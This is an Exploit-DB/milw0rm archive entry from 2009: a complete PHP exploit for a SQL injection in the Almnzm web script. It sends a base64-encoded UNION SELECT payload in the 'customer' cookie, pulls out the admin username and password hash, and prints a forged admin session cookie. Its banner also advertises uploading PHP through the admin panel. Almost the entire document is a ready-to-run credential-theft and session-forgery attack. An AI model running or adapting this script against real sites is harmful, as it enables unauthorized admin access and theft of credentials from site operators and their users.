Almnzm - 'COOKIE: customer' SQL Injection

EDB-ID:

9035

CVE:

N/A

Author:

Qabandi

Type:

webapps

Platform:

PHP

Published:

2009-06-29

<?
print_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
---Script Almnzm SQL INJECTION     __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
---"Powered by Almnzm"          /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
---admin cookie create        |QQQQ/    By  Qabandi             \QQQQ|
---Add PhP Ext                |QQQQ|                            |QQQQ|
---Upload php in adminCP      |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                               \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
');

if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/
-----------------------------------------------------------------------------
');
die;
}
$host = $argv[1];
$p = "http://".$host.$argv[2];

 function QAB_GET($qabandi, $from){
$content = $from;
preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/",
    $content,
    $out, PREG_PATTERN_ORDER);

return $out[1][0];
 }



          $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n";
          $packet.="Connection: Close\r\n\r\n";
	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "\n[x] 404 Not Found... Make sure of path. \n";
		die;
	}
	
echo "\n\n---Qabandi Is Here-------------------------------------------\n\n";

$Q_ver = QAB_GET("version", $data);
$Q_usr = QAB_GET("user", $data);
$Q_pwd = QAB_GET("pass", $data);


echo "[q]version:\n".$Q_ver."\n\n";
echo "[q]Admin User:\n".$Q_usr."\n\n";
echo "[q]Admin Hash:\n".$Q_pwd."\n\n";

$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);

echo "\n---Admin Cookie:\n";
echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n";
echo "\n\n---Qabandi Was Here------------------------------------------\n\n";
die;
?>

# milw0rm.com [2009-06-29]